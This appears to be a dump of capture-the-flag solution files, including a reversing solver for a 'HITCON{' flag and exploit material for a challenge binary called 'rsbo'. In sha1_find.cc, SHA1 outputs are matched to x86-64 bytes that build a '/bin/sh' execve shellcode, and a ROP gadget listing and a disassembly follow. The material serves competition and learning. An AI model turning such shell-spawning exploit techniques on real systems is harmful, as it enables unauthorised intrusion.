24 | ['i', 28162, 'l'], 25 | ['s', 29721, 'l'], 26 | [' ', 31348, 'r'], 27 | ['l', 32939, 'a'], 28 | ['o', 34456, 't'], 29 | # n 30 | # g 31 | # e 32 | # s 33 | # t 34 | # e 35 | # ??? psenyl 45710 s 36 | # t ttreonyl 37 | # e 38 | # s 39 | # t 40 | # e 41 | # s 42 | 43 | ].each do |c, i, r| 44 | if pneu[i] != c 45 | raise 46 | end 47 | pneu[i] = r 48 | end 49 | 50 | #pneu.sub!(' ', 'y') 51 | 52 | pneu.sub!('!', 'a') 53 | pneu.sub!('!', 'a') 54 | pneu.sub!('!', 'i') 55 | 56 | pneu.sub!('}', 't') 57 | 58 | copy = pneu.dup 59 | $rep = [] 60 | 61 | def repl(pneu, x) 62 | pneu.gsub!(x, '') 63 | $rep << x 64 | end 65 | 66 | def last(c) 67 | x = c.dup 68 | $rep.each do |r| 69 | x.gsub!(r, '_' * r.size) 70 | end 71 | puts x 72 | end 73 | 74 | repl(pneu, 'acetylseryl') 75 | #copy.gsub!('acetylseryl', '_') 76 | repl(pneu, 'glutaminyl') 77 | #copy.gsub!('glutaminyl', '_') 78 | repl(pneu, 'aspartyl') 79 | #copy.gsub!('aspartyl', '_') 80 | repl(pneu, 'iso') 81 | #copy.gsub!('iso', '_') 82 | #repl(pneu, 'isoleucyl') 83 | repl(pneu, 'tryptophyl') 84 | #copy.gsub!('tryptophyl', '_') 85 | 86 | while true 87 | prev = 0 88 | ps = 0 89 | 4.upto(99) do |l| 90 | s = pneu.scan(pneu[0, l]).size 91 | v = s * l 92 | if v < prev 93 | if s == 1 94 | puts pneu 95 | exit 96 | end 97 | 98 | if v < 40 99 | puts pneu 100 | #puts copy 101 | exit 102 | end 103 | 104 | l -= 1 105 | s = pneu.scan(pneu[0, l]).size 106 | v = s * l 107 | STDERR.puts "#{pneu[0, l]} #{l}*#{s}=#{v} #{pneu.size}" 108 | repl(pneu, pneu[0, l]) 109 | #copy.gsub!(pneu[0, l], '_') 110 | STDERR.puts "#{pneu[0,16]}..." 111 | break 112 | end 113 | 114 | prev = v 115 | 116 | if l == 99 117 | puts pneu 118 | last(copy) 119 | #puts copy 120 | exit 121 | end 122 | end 123 | 124 | end 125 | 126 | # pneu.gsub!(/Methiony/i) 127 | # pneu.gsub!('lthreony') 128 | # pneu.gsub!('glutaminyl') 129 | # pneu.gsub!('larginyl') 130 | # pneu.gsub!('tyrosyl') 131 | # pneu.gsub!('glutamyl') 132 | # pneu.gsub!('seryl') 133 | # pneu.gsub!('leucyl') 134 | 135 | 136 | 137 | puts pneu 138 | exit 139 | 140 | m = {} 141 | pneu.chars.each do |c| 142 | m[c] = 0 if !m[c] 143 | m[c] += 1 144 | end 145 | 146 | m.sort_by{|x, y|-y}.each do |x, y| 147 | puts "#{x} #{y}" 148 | end 149 | 150 | puts pneu[10921 + 1500, 200] 151 | puts pneu[10921 + 3000, 400] 152 | 153 | -------------------------------------------------------------------------------- /mid.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | //#define SIZE_Q 4 7 | //#define PQ_NUM (99 / SIZE_Q) 8 | 9 | //#define SIZE_Q 5000 10 | #define SIZE_Q 400 11 | //#define SIZE_Q 100 12 | #define PQ_NUM (100000 / SIZE_Q) 13 | 14 | typedef long long LL; 15 | 16 | typedef struct { 17 | int fds[2]; 18 | int cnt; 19 | } PipeQ; 20 | 21 | //LL arr[SIZE_Q]; 22 | LL* arr; 23 | //LL arr[5000]; 24 | PipeQ* pq; 25 | 26 | void initPQ(PipeQ* q) { 27 | q->cnt = 0; 28 | pipe(q->fds); 29 | } 30 | 31 | LL popPQ(PipeQ* q) { 32 | if (q->cnt <= 0) { 33 | q->cnt = -1; 34 | return LLONG_MAX; 35 | } 36 | q->cnt--; 37 | LL r; 38 | read(q->fds[0], &r, sizeof(r)); 39 | return r; 40 | } 41 | 42 | int cmp(const void* xp, const void* yp) { 43 | LL x = *(LL*)xp; 44 | LL y = *(LL*)yp; 45 | if (x > y) 46 | return 1; 47 | if (x < y) 48 | return -1; 49 | return 0; 50 | } 51 | 52 | void flushPQ(PipeQ* q, int sz) { 53 | #if 1 54 | int i; 55 | qsort(arr, sz, 8, cmp); 56 | for (i = 0; i < sz; i++) { 57 | //printf("%lld\n", arr[i]); 58 | write(q->fds[1], &arr[i], sizeof(LL)); 59 | } 60 | q->cnt = sz; 61 | #else 62 | q->cnt = 0; 63 | #endif 64 | } 65 | 66 | int main() { 67 | int i, j, qi, pqi, qnum = 0; 68 | arr = malloc(SIZE_Q * sizeof(LL)); 69 | pq = malloc(PQ_NUM * sizeof(PipeQ)); 70 | 71 | memset(arr, 0, sizeof(arr)); 72 | 73 | for (i = 0; i < PQ_NUM; i++) { 74 | initPQ(&pq[i]); 75 | } 76 | 77 | int n; 78 | scanf("%d",&n); 79 | 80 | //sleep(1); 81 | 82 | int tot = 0; 83 | for(i = 0; i < n + 1; i++){ 84 | j = i % SIZE_Q; 85 | 86 | pqi = (i - 1) / SIZE_Q; 87 | qi = i / SIZE_Q; 88 | if (i && (i == n || pqi != qi)) { 89 | int sz = SIZE_Q; 90 | if (i == n && j) 91 | sz = j; 92 | qnum++; 93 | /* printf("come pqi=%d i=%d sz=%d arr[0]=%lld arr[-1]=%lld\n", */ 94 | /* pqi, i, sz, arr[0], arr[SIZE_Q-1]); */ 95 | flushPQ(&pq[pqi], sz); 96 | /* printf("come i=%d sz=%d arr[0]=%lld arr[-1]=%lld\n", */ 97 | /* i, sz, arr[0], arr[sz-1]); */ 98 | tot += sz; 99 | } 100 | 101 | if (i != n) { 102 | scanf("%lld", &arr[j]); 103 | } 104 | } 105 | 106 | //sleep(1); 107 | //printf("%lld\n", 1); return 0; 108 | 109 | //fprintf(stderr, "qnum=%d tot=%d\n", qnum, tot); 110 | //sleep(1); 111 | 112 | for (i = 0; i < qnum; i++) { 113 | arr[i] = popPQ(&pq[i]); 114 | } 115 | 116 | LL min_val; 117 | for (i = 0; i < n / 2 + 1; i++) { 118 | min_val = LLONG_MAX; 119 | int min_qi = -1; 120 | for (qi = 0; qi < qnum; qi++) { 121 | //if (arr[qi] != -1 && min_val >= arr[qi]) { 122 | //if (/*arr[qi] != -1 &&*/ min_val >= arr[qi]) { 123 | if (pq[qi].cnt >= 0 && min_val >= arr[qi]) { 124 | min_val = arr[qi]; 125 | min_qi = qi; 126 | } 127 | } 128 | 129 | //if (min_qi == -1) 130 | // abort(); 131 | 132 | #if 0 133 | printf("%lld %d (%lld vs %lld vs %lld vs %lld vs %lld vs %lld)\n", 134 | min_val, min_qi, 135 | arr[0], arr[1], arr[2], arr[3], arr[4], arr[5]); 136 | #endif 137 | arr[min_qi] = popPQ(&pq[min_qi]); 138 | #if 0 139 | printf("%lld %d (%lld vs %lld vs %lld vs %lld vs %lld vs %lld)\n", 140 | min_val, min_qi, 141 | arr[0], arr[1], arr[2], arr[3], arr[4], arr[5]); 142 | #endif 143 | } 144 | 145 | //if (min_val > 700000) 146 | // sleep(1); 147 | 148 | #if 0 149 | if (min_val < 0) 150 | sleep(2); 151 | else if (min_val > 0) 152 | sleep(1); 153 | #endif 154 | 155 | printf("%lld", min_val); 156 | 157 | //sleep(1); 158 | return 0; 159 | } 160 | -------------------------------------------------------------------------------- /sha1_find.cc: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | #include 4 | 5 | #include 6 | #include 7 | 8 | using namespace std; 9 | 10 | unsigned char WANTED[][3] = { 11 | // 4004ca: 48 89 c8 mov %rcx,%rax 12 | { 0x48,0x89,0xc8 }, 13 | // 4004cd: 48 89 c6 mov %rax,%rsi 14 | { 0x48,0x89,0xc6 }, 15 | // 4004d0: 48 89 c2 mov %rax,%rdx 16 | { 0x48,0x89,0xc2 }, 17 | // 4004d3: 48 ff c2 inc %rdx 18 | { 0x48,0xff,0xc2 }, 19 | // 4004d6: 48 ff c2 inc %rdx 20 | { 0x48,0xff,0xc2 }, 21 | // 4004d9: 48 ff c2 inc %rdx 22 | { 0x48,0xff,0xc2 }, 23 | // 4004dc: 48 ff c2 inc %rdx 24 | { 0x48,0xff,0xc2 }, 25 | // 4004df: 48 ff c2 inc %rdx 26 | { 0x48,0xff,0xc2 }, 27 | // 4004e2: 48 ff c2 inc %rdx 28 | { 0x48,0xff,0xc2 }, 29 | // 4004e5: 48 ff c2 inc %rdx 30 | { 0x48,0xff,0xc2 }, 31 | // 4004e8: 48 ff c2 inc %rdx 32 | { 0x48,0xff,0xc2 }, 33 | // 4004eb: 48 ff c2 inc %rdx 34 | { 0x48,0xff,0xc2 }, 35 | // 4004ee: 48 ff c2 inc %rdx 36 | { 0x48,0xff,0xc2 }, 37 | // 4004f1: 48 ff c2 inc %rdx 38 | { 0x48,0xff,0xc2 }, 39 | // 4004f4: 48 ff c2 inc %rdx 40 | { 0x48,0xff,0xc2 }, 41 | // 4004f7: 48 ff c2 inc %rdx 42 | { 0x48,0xff,0xc2 }, 43 | // 4004fa: 48 ff c2 inc %rdx 44 | { 0x48,0xff,0xc2 }, 45 | // 4004fd: 48 ff c2 inc %rdx 46 | { 0x48,0xff,0xc2 }, 47 | // 400500: 48 ff c2 inc %rdx 48 | { 0x48,0xff,0xc2 }, 49 | // 400503: 48 89 10 mov %rdx,(%rax) 50 | { 0x48,0x89,0x10 }, 51 | // 400506: 48 83 c0 08 add $0x8,%rax 52 | // 40050a: 48 31 d2 xor %rdx,%rdx 53 | { 0x48,0x31,0xd2 }, 54 | // 40050d: 48 89 10 mov %rdx,(%rax) 55 | { 0x48,0x89,0x10 }, 56 | // 400510: 48 83 c0 08 add $0x8,%rax 57 | // 400514: 48 89 c7 mov %rax,%rdi 58 | { 0x48,0x89,0xc7 }, 59 | // 400517: c6 00 2f movb $0x2f,(%rax) 60 | { 0xc6,0x00,0x2f }, 61 | // 40051a: 48 ff c0 inc %rax 62 | { 0x48,0xff,0xc0 }, 63 | // 40051d: c6 00 62 movb $0x62,(%rax) 64 | { 0xc6,0x00,0x62 }, 65 | // 400520: 48 ff c0 inc %rax 66 | { 0x48,0xff,0xc0 }, 67 | // 400523: c6 00 69 movb $0x69,(%rax) 68 | { 0xc6,0x00,0x69 }, 69 | // 400526: 48 ff c0 inc %rax 70 | { 0x48,0xff,0xc0 }, 71 | // 400529: c6 00 6e movb $0x6e,(%rax) 72 | { 0xc6,0x00,0x6e }, 73 | // 40052c: 48 ff c0 inc %rax 74 | { 0x48,0xff,0xc0 }, 75 | // 40052f: c6 00 2f movb $0x2f,(%rax) 76 | { 0xc6,0x00,0x2f }, 77 | // 400532: 48 ff c0 inc %rax 78 | { 0x48,0xff,0xc0 }, 79 | // 400535: c6 00 73 movb $0x73,(%rax) 80 | { 0xc6,0x00,0x73 }, 81 | // 400538: 48 ff c0 inc %rax 82 | { 0x48,0xff,0xc0 }, 83 | // 40053b: c6 00 68 movb $0x68,(%rax) 84 | { 0xc6,0x00,0x68 }, 85 | // 40053e: 48 ff c0 inc %rax 86 | { 0x48,0xff,0xc0 }, 87 | // 400541: c6 00 00 movb $0x0,(%rax) 88 | { 0xc6,0x00,0x00 }, 89 | // 400544: 48 ff c0 inc %rax 90 | { 0x48,0xff,0xc0 }, 91 | // 400547: 48 89 f2 mov %rsi,%rdx 92 | { 0x48,0x89,0xf2 }, 93 | // 40054a: 48 31 c0 xor %rax,%rax 94 | { 0x48,0x31,0xc0 }, 95 | { 0,0,0 } 96 | }; 97 | 98 | int main() { 99 | int wn; 100 | for (wn = 0; WANTED[wn][0]; wn++) {} 101 | 102 | vector strs; 103 | strs.resize(wn); 104 | 105 | unsigned char buf[99]; 106 | unsigned char sha[99]; 107 | int fn = 0; 108 | for (int i = 0; i < (1<<30) && wn != fn; i++) { 109 | sprintf((char*)buf, "%016d", i); 110 | SHA1(buf, 16, sha); 111 | 112 | for (int j = 0; j < wn; j++) { 113 | unsigned char* w = WANTED[j]; 114 | if (w[0] == sha[17] && w[1] == sha[18] && w[2] == sha[19] && w[0]) { 115 | w[0] = 0; 116 | fn++; 117 | strs[j] = (char*)buf; 118 | } 119 | } 120 | } 121 | 122 | for (int i = 0; i < wn; i++) { 123 | printf("%s\n", strs[i].c_str()); 124 | } 125 | } 126 | -------------------------------------------------------------------------------- /rsbo_rop.txt: -------------------------------------------------------------------------------- 1 | Gadgets information 2 | ============================================================ 3 | 0x080488e3 : adc al, 0x41 ; ret 4 | 0x080484f0 : add al, 0x24 ; inc eax ; mov al, byte ptr [0xd0ff0804] ; leave ; ret 5 | 0x0804852d : add al, 0x24 ; inc eax ; mov al, byte ptr [0xd2ff0804] ; leave ; ret 6 | 0x080484f4 : add al, 8 ; call eax 7 | 0x08048531 : add al, 8 ; call edx 8 | 0x080484d8 : add al, 8 ; cmp eax, 6 ; ja 0x80484e7 ; ret 9 | 0x0804872f : add byte ptr [eax], al ; add byte ptr [eax], al ; leave ; ret 10 | 0x08048730 : add byte ptr [eax], al ; add cl, cl ; ret 11 | 0x080483c8 : add byte ptr [eax], al ; add esp, 8 ; pop ebx ; ret 12 | 0x08048731 : add byte ptr [eax], al ; leave ; ret 13 | 0x080488e0 : add cl, byte ptr [eax + 0xe] ; adc al, 0x41 ; ret 14 | 0x08048732 : add cl, cl ; ret 15 | 0x080488dc : add eax, 0x2300e4e ; dec eax ; push cs ; adc al, 0x41 ; ret 16 | 0x08048512 : add eax, edx ; sar eax, 1 ; jne 0x804851f ; ret 17 | 0x08048799 : add esp, 0x1c ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret 18 | 0x080483ca : add esp, 8 ; pop ebx ; ret 19 | 0x0804857a : and al, 0x10 ; lahf ; add al, 8 ; call eax 20 | 0x080484f1 : and al, 0x40 ; mov al, byte ptr [0xd0ff0804] ; leave ; ret 21 | 0x0804852e : and al, 0x40 ; mov al, byte ptr [0xd2ff0804] ; leave ; ret 22 | 0x0804852a : and al, 4 ; mov dword ptr [esp], 0x804a040 ; call edx 23 | 0x080481a4 : bound esi, dword ptr [edx + 0xfeb48422] ; ret 24 | 0x080483b0 : call 0x80484c6 25 | 0x080484f6 : call eax 26 | 0x08048533 : call edx 27 | 0x08048515 : clc ; jne 0x804851c ; ret 28 | 0x080484db : clc ; push es ; ja 0x80484e4 ; ret 29 | 0x080484da : cmp eax, 6 ; ja 0x80484e5 ; ret 30 | 0x080488e1 : dec eax ; push cs ; adc al, 0x41 ; ret 31 | 0x08048659 : dec ecx ; ret 32 | 0x080488dd : dec esi ; push cs ; xor byte ptr [edx], al ; dec eax ; push cs ; adc al, 0x41 ; ret 33 | 0x08048798 : fild word ptr [ebx + 0x5e5b1cc4] ; pop edi ; pop ebp ; ret 34 | 0x080484f2 : inc eax ; mov al, byte ptr [0xd0ff0804] ; leave ; ret 35 | 0x0804852f : inc eax ; mov al, byte ptr [0xd2ff0804] ; leave ; ret 36 | 0x080484d6 : inc eax ; mov al, byte ptr [0xf8830804] ; push es ; ja 0x80484e9 ; ret 37 | 0x080488e4 : inc ecx ; ret 38 | 0x080484dd : ja 0x80484e2 ; ret 39 | 0x08048883 : jmp dword ptr [ebx] 40 | 0x08048516 : jne 0x804851b ; ret 41 | 0x08048797 : jne 0x8048781 ; add esp, 0x1c ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret 42 | 0x0804857c : lahf ; add al, 8 ; call eax 43 | 0x080484f8 : leave ; ret 44 | 0x0804879a : les ebx, ptr [ebx + ebx*2] ; pop esi ; pop edi ; pop ebp ; ret 45 | 0x080483cb : les ecx, ptr [eax] ; pop ebx ; ret 46 | 0x080481a1 : loopne 0x804814a ; pop ds ; bound esi, dword ptr [edx + 0xfeb48422] ; ret 47 | 0x080481a8 : mov ah, -2 ; ret 48 | 0x080484f3 : mov al, byte ptr [0xd0ff0804] ; leave ; ret 49 | 0x08048530 : mov al, byte ptr [0xd2ff0804] ; leave ; ret 50 | 0x080484d7 : mov al, byte ptr [0xf8830804] ; push es ; ja 0x80484e8 ; ret 51 | 0x08048578 : mov dword ptr [esp], 0x8049f10 ; call eax 52 | 0x080484ef : mov dword ptr [esp], 0x804a040 ; call eax 53 | 0x0804852c : mov dword ptr [esp], 0x804a040 ; call edx 54 | 0x0804872e : mov eax, 0 ; leave ; ret 55 | 0x080484c0 : mov ebx, dword ptr [esp] ; ret 56 | 0x080484bf : nop ; mov ebx, dword ptr [esp] ; ret 57 | 0x080484bd : nop ; nop ; mov ebx, dword ptr [esp] ; ret 58 | 0x080484bb : nop ; nop ; nop ; mov ebx, dword ptr [esp] ; ret 59 | 0x080484f5 : or bh, bh ; ror cl, 1 ; ret 60 | 0x08048532 : or bh, bh ; ror cl, cl ; ret 61 | 0x080484d9 : or byte ptr [ebx + 0x17706f8], al ; ret 62 | 0x08048511 : pop ds ; add eax, edx ; sar eax, 1 ; jne 0x8048520 ; ret 63 | 0x080481a3 : pop ds ; bound esi, dword ptr [edx + 0xfeb48422] ; ret 64 | 0x0804879f : pop ebp ; ret 65 | 0x0804879c : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 66 | 0x080483cd : pop ebx ; ret 67 | 0x0804879e : pop edi ; pop ebp ; ret 68 | 0x0804879d : pop esi ; pop edi ; pop ebp ; ret 69 | 0x080488e2 : push cs ; adc al, 0x41 ; ret 70 | 0x080488de : push cs ; xor byte ptr [edx], al ; dec eax ; push cs ; adc al, 0x41 ; ret 71 | 0x08048745 : push ebx ; call 0x80484c7 72 | 0x080484dc : push es ; ja 0x80484e3 ; ret 73 | 0x08048744 : push esi ; push ebx ; call 0x80484c8 74 | 0x08048513 : rcl cl ; clc ; jne 0x804851e ; ret 75 | 0x080481aa : ret 76 | 0x0804850e : ret -0x153f 77 | 0x08048608 : ret -0x2f77 78 | 0x080484f7 : ror cl, 1 ; ret 79 | 0x08048534 : ror cl, cl ; ret 80 | 0x080481a2 : sahf ; pop ds ; bound esi, dword ptr [edx + 0xfeb48422] ; ret 81 | 0x08048514 : sar eax, 1 ; jne 0x804851d ; ret 82 | 0x080484c1 : sbb al, 0x24 ; ret 83 | 0x0804879b : sbb al, 0x5b ; pop esi ; pop edi ; pop ebp ; ret 84 | 0x0804850f : shr edx, 0x1f ; add eax, edx ; sar eax, 1 ; jne 0x8048522 ; ret 85 | 0x080483ad : sub esp, 8 ; call 0x80484c9 86 | 0x080488df : xor byte ptr [edx], al ; dec eax ; push cs ; adc al, 0x41 ; ret 87 | 88 | Unique gadgets found: 84 89 | -------------------------------------------------------------------------------- /hop_graph.cc: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | #include 10 | #include 11 | #include 12 | #include 13 | 14 | using namespace std; 15 | 16 | typedef unsigned char byte; 17 | const char* HOP = "hop-62fa7ade9a1fa9254361e69d70e7a7e3.exe"; 18 | 19 | struct Chain { 20 | size_t addr; 21 | int mul; 22 | int add; 23 | }; 24 | 25 | struct Ctx { 26 | int addr; 27 | string flag; 28 | //set seen; 29 | }; 30 | 31 | //const int GOAL = 0x4015b9; 32 | const int GOAL = 0x43dbd2; 33 | const int DEAD = 0x4015bf; 34 | 35 | bool is_goal_reachable(int addr, multimap >& nex, 36 | string* out = NULL) { 37 | if (addr == DEAD) 38 | return false; 39 | 40 | map route; 41 | queue > q; 42 | q.push(make_pair(addr, "")); 43 | 44 | while (!q.empty()) { 45 | auto p = q.front(); 46 | q.pop(); 47 | 48 | if (!route.insert(p).second) 49 | continue; 50 | 51 | int a = p.first; 52 | if (a == DEAD) 53 | continue; 54 | 55 | if (a == GOAL) { 56 | if (out) 57 | *out = p.second; 58 | return true; 59 | } 60 | 61 | auto found = nex.find(a); 62 | if (found == nex.end()) { 63 | printf("%x %s\n", a, p.second.c_str()); 64 | abort(); 65 | } 66 | 67 | for (auto iter = found; 68 | iter != nex.end() && iter->first == a; 69 | ++iter) { 70 | auto e = iter->second; 71 | q.push(make_pair(e.second, p.second + e.first)); 72 | } 73 | } 74 | return false; 75 | } 76 | 77 | int main() { 78 | int fd = open(HOP, O_RDONLY); 79 | const size_t text_size = 0x002c6510; 80 | byte* text = (byte*)calloc(text_size + 1000, 1); 81 | 82 | lseek(fd, 0x400, SEEK_SET); 83 | read(fd, text, 0x2c6510); 84 | 85 | vector chains; 86 | 87 | for (size_t i = 0; i < text_size; i++) { 88 | //printf("%zu %d\n", i, text[i]); 89 | if (text[i] == 0x58 && 90 | // imul 91 | text[i+1] == 0x48 && 92 | text[i+2] == 0x69 && 93 | text[i+3] == 0xc0 && 94 | text[i+6] == 0x00 && 95 | text[i+7] == 0x00 && 96 | // mov 97 | text[i+8] == 0x8b && 98 | text[i+9] == 0x84 && 99 | text[i+10] == 0x02 && 100 | text[i+13] == 0x00 && 101 | text[i+14] == 0x00 && 102 | // cltq 103 | text[i+15] == 0x48 && 104 | text[i+16] == 0x98 && 105 | // add 106 | text[i+17] == 0x48 && 107 | text[i+18] == 0x01 && 108 | text[i+19] == 0xc2 && 109 | // jmp 110 | text[i+20] == 0xff && 111 | text[i+21] == 0xe2) { 112 | size_t addr = i + 0x401000; 113 | int mul = text[i+5] * 256 + text[i+4]; 114 | int add = text[i+12] * 256 + text[i+11]; 115 | printf("%zx %x %x\n", addr, mul, add); 116 | Chain ch = {addr, mul, add}; 117 | chains.push_back(ch); 118 | } 119 | } 120 | 121 | set verts; 122 | multimap > nex; 123 | multimap > rev; 124 | map > nex_map; 125 | 126 | for (size_t i = 0; i < chains.size(); i++) { 127 | Chain c = chains[i]; 128 | for (int b = 0; b < 127; b++) { 129 | if (b < 32 && b > 0) 130 | continue; 131 | int eax = b * c.mul; 132 | eax = c.add + c.addr + eax; 133 | eax = *(int*)(text + eax - 0x401000); 134 | int go = c.addr + eax; 135 | //puts "#{b.chr} #{'%x'%edx} => #{'%x'%go}" 136 | printf("%c %x => %x\n", b, c.addr, go); 137 | 138 | nex.insert(make_pair(c.addr, make_pair(b, go))); 139 | rev.insert(make_pair(go, make_pair(b, c.addr))); 140 | nex_map[c.addr][b] = go; 141 | verts.insert(c.addr); 142 | } 143 | } 144 | 145 | puts("==="); 146 | 147 | map route; 148 | queue > q; 149 | int addr = 0x43a8fb; 150 | string flag = "HITCON{"; 151 | //q.push(make_pair(0x44f491, "")); 152 | //q.push(make_pair(0x43a8fb, "HITCON{")); 153 | 154 | //string fix = "COf Us@ HUBA 0f Us@ 5"; 155 | //string fix = "CabS0f Us@ 5hr1n] 0f Us@ "; 156 | //string fix = "yAA 0f Us@+U=: 0fUs@ 5hr1n3"; 157 | //string fix = "CH2(Us@ H@A: 0f Us@ 5hr1n"; 158 | //string fix = "CHeih1t-Q@ 5hr1n"; 159 | //string fix = "CapiS"; 160 | //string fix = "Cap7urA"; 161 | string fix = "Cap7u"; 162 | for (int i = 0; i < fix.size(); i++) { 163 | addr = nex_map[addr][fix[i]]; 164 | flag += fix[i]; 165 | } 166 | 167 | for (int b = 0; b < 127; b++) { 168 | if (b < 32 && b > 0) 169 | continue; 170 | 171 | int a = nex_map[addr][b]; 172 | string s; 173 | if (is_goal_reachable(a, nex, &s)) { 174 | printf("%c %x => %x %c%s\n", b, addr, a, b, s.c_str()); 175 | } 176 | } 177 | 178 | #if 0 179 | string fix = "C"; 180 | for (int i = 0; i < fix.size(); i++) { 181 | addr = nex_map[addr][fix[i]]; 182 | flag += fix[i]; 183 | } 184 | 185 | q.push(make_pair(addr, flag)); 186 | 187 | while (!q.empty()) { 188 | auto p = q.front(); 189 | q.pop(); 190 | 191 | if (!route.insert(p).second) 192 | continue; 193 | 194 | int a = p.first; 195 | if (a == 0x4015bf) 196 | continue; 197 | 198 | auto found = nex.find(a); 199 | if (found == nex.end()) { 200 | printf("%x %s\n", a, p.second.c_str()); 201 | return 0; 202 | } 203 | 204 | for (auto iter = found; 205 | iter != nex.end() && iter->first == a; 206 | ++iter) { 207 | auto e = iter->second; 208 | q.push(make_pair(e.second, p.second + e.first)); 209 | } 210 | } 211 | #endif 212 | 213 | #if 0 214 | vector addrs = { 0x44f491, "" }; 215 | for (int i = 0; i < 40; i++) { 216 | set naddrs; 217 | for (int a : addrs) { 218 | auto found = nex.find(a); 219 | if (found == nex.end()) 220 | continue; 221 | //abort(); 222 | 223 | for (auto iter = found; 224 | iter != nex.end() && iter->first == a; 225 | ++iter) { 226 | auto p = iter->second; 227 | printf("%x (%c)=> %x\n", a, p.first, p.second); 228 | naddrs.insert(p.second); 229 | } 230 | } 231 | 232 | addrs.clear(); 233 | addrs.assign(naddrs.begin(), naddrs.end()); 234 | } 235 | #endif 236 | 237 | #if 0 238 | vector addrs = { 0x44f491 }; 239 | //vector addrs = { 0x43a8fb }; 240 | for (int i = 0; i < 40; i++) { 241 | puts("---"); 242 | printf("%d %zu\n", i, addrs.size()); 243 | set naddrs; 244 | for (int a : addrs) { 245 | auto found = nex.find(a); 246 | if (found == nex.end()) 247 | continue; 248 | //abort(); 249 | 250 | for (auto iter = found; 251 | iter != nex.end() && iter->first == a; 252 | ++iter) { 253 | auto p = iter->second; 254 | printf("%x (%c)=> %x\n", a, p.first, p.second); 255 | naddrs.insert(p.second); 256 | } 257 | } 258 | 259 | addrs.clear(); 260 | addrs.assign(naddrs.begin(), naddrs.end()); 261 | } 262 | #endif 263 | 264 | #if 0 265 | //const int goal = 0x4015b9; 266 | set seen; 267 | 268 | queue q; 269 | q.push(Ctx({0x4015b9, ""})); 270 | //q.push(Ctx({0x43dbd2, ""})); 271 | //q.push(Ctx({0x403d07, ""})); 272 | 273 | while (!q.empty()) { 274 | Ctx c = q.front(); 275 | q.pop(); 276 | 277 | printf("%x %s\n", c.addr, c.flag.c_str()); 278 | 279 | auto found = rev.find(c.addr); 280 | if (found == rev.end()) 281 | continue; 282 | //return 0; 283 | for (auto iter = found; 284 | iter != rev.end() && iter->first == c.addr; 285 | ++iter) { 286 | auto p = iter->second; 287 | //printf("%c %d\n", p.first, p.first); 288 | int goal = p.second; 289 | //set seen = c.seen; 290 | if (seen.insert(goal).second) { 291 | q.push(Ctx({goal, p.first + c.flag})); 292 | } 293 | } 294 | } 295 | 296 | #endif 297 | } 298 | -------------------------------------------------------------------------------- /rsbo2.txt: -------------------------------------------------------------------------------- 1 | 2 | rsbo-4a707e7d07e87ab97348be36efea28dc: file format elf32-i386 3 | 4 | 5 | Disassembly of section .init: 6 | 7 | 080483ac <_init>: 8 | 80483ac: 53 push %ebx 9 | 80483ad: 83 ec 08 sub $0x8,%esp 10 | 80483b0: e8 0b 01 00 00 call 80484c0 <__x86.get_pc_thunk.bx> 11 | 80483b5: 81 c3 4b 1c 00 00 add $0x1c4b,%ebx 12 | 80483bb: 8b 83 fc ff ff ff mov -0x4(%ebx),%eax 13 | 80483c1: 85 c0 test %eax,%eax 14 | 80483c3: 74 05 je 80483ca <_init+0x1e> 15 | 80483c5: e8 46 00 00 00 call 8048410 <__gmon_start__@plt> 16 | 80483ca: 83 c4 08 add $0x8,%esp 17 | 80483cd: 5b pop %ebx 18 | 80483ce: c3 ret 19 | 20 | Disassembly of section .plt: 21 | 22 | 080483d0 : 23 | 80483d0: ff 35 04 a0 04 08 pushl 0x804a004 24 | 80483d6: ff 25 08 a0 04 08 jmp *0x804a008 25 | 80483dc: 00 00 add %al,(%eax) 26 | ... 27 | 28 | 080483e0 : 29 | 80483e0: ff 25 0c a0 04 08 jmp *0x804a00c 30 | 80483e6: 68 00 00 00 00 push $0x0 31 | 80483eb: e9 e0 ff ff ff jmp 80483d0 <_init+0x24> 32 | 33 | 080483f0 : 34 | 80483f0: ff 25 10 a0 04 08 jmp *0x804a010 35 | 80483f6: 68 08 00 00 00 push $0x8 36 | 80483fb: e9 d0 ff ff ff jmp 80483d0 <_init+0x24> 37 | 38 | 08048400 : 39 | 8048400: ff 25 14 a0 04 08 jmp *0x804a014 40 | 8048406: 68 10 00 00 00 push $0x10 41 | 804840b: e9 c0 ff ff ff jmp 80483d0 <_init+0x24> 42 | 43 | 08048410 <__gmon_start__@plt>: 44 | 8048410: ff 25 18 a0 04 08 jmp *0x804a018 45 | 8048416: 68 18 00 00 00 push $0x18 46 | 804841b: e9 b0 ff ff ff jmp 80483d0 <_init+0x24> 47 | 48 | 08048420 : 49 | 8048420: ff 25 1c a0 04 08 jmp *0x804a01c 50 | 8048426: 68 20 00 00 00 push $0x20 51 | 804842b: e9 a0 ff ff ff jmp 80483d0 <_init+0x24> 52 | 53 | 08048430 : 54 | 8048430: ff 25 20 a0 04 08 jmp *0x804a020 55 | 8048436: 68 28 00 00 00 push $0x28 56 | 804843b: e9 90 ff ff ff jmp 80483d0 <_init+0x24> 57 | 58 | 08048440 <__libc_start_main@plt>: 59 | 8048440: ff 25 24 a0 04 08 jmp *0x804a024 60 | 8048446: 68 30 00 00 00 push $0x30 61 | 804844b: e9 80 ff ff ff jmp 80483d0 <_init+0x24> 62 | 63 | 08048450 : 64 | 8048450: ff 25 28 a0 04 08 jmp *0x804a028 65 | 8048456: 68 38 00 00 00 push $0x38 66 | 804845b: e9 70 ff ff ff jmp 80483d0 <_init+0x24> 67 | 68 | 08048460 : 69 | 8048460: ff 25 2c a0 04 08 jmp *0x804a02c 70 | 8048466: 68 40 00 00 00 push $0x40 71 | 804846b: e9 60 ff ff ff jmp 80483d0 <_init+0x24> 72 | 73 | 08048470 : 74 | 8048470: ff 25 30 a0 04 08 jmp *0x804a030 75 | 8048476: 68 48 00 00 00 push $0x48 76 | 804847b: e9 50 ff ff ff jmp 80483d0 <_init+0x24> 77 | 78 | 08048480 : 79 | 8048480: ff 25 34 a0 04 08 jmp *0x804a034 80 | 8048486: 68 50 00 00 00 push $0x50 81 | 804848b: e9 40 ff ff ff jmp 80483d0 <_init+0x24> 82 | 83 | Disassembly of section .text: 84 | 85 | 08048490 <_start>: 